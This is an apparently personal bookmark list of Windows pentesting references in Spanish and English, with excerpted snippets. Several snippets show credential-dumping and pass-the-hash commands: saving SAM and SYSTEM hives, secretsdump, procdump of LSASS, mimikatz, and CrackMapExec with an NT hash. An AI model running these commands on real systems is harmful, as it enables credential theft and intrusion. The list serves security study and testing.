https://academy.hackthebox.com/course/preview/file-transfers/windows-file-transfer-methods PowerShell DownloadFile Method We can specify the class name Net.WebClient and the method DownloadFile with the parameters corresponding to the URL of the target file to download and the output file name. File Download PowerShell DownloadString – Fileless Method As we previously discussed,… Read more ›
https://book.hacktricks.xyz/network-services-pentesting/pentesting-smbhttps://github.com/ShawnDEvans/smbmap Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”
https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name… Read more ›
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/ Crackmapexec cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.localSMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB 10.0.0.20… Read more ›
https://pure.security/dumping-windows-credentials/ Registros C:> reg.exe save hklm\sam c:\temp\sam.saveC:> reg.exe save hklm\security c:\temp\security.saveC:> reg.exe save hklm\system c:\temp\system.save Password Hashes (Impacket) $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Credenciales en memoria (Procdump) C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 C:> mimikatz.exe… Read more ›
Ref: https://meriemlarouim.medium.com/credentials-in-windows-and-how-to-dump-them-remotely-b5c315bb76f4 Example of an LM hash : aad3b435b51404eeaad3b435b51404ee PS : “aad3b435b51404eeaad3b435b51404ee” is the Null hash.
https://bitvijays.github.io/LFC-VulnerableMachines.html#ctf-series-vulnerable-machines
Página Official:https://owtf.github.io/ Instalación (recomendado usar Docker):https://owtf.readthedocs.io/en/develop/installation/methods.html#docker Primeros pasos (Autenticación):https://owtf.readthedocs.io/en/develop/usage/authentication.html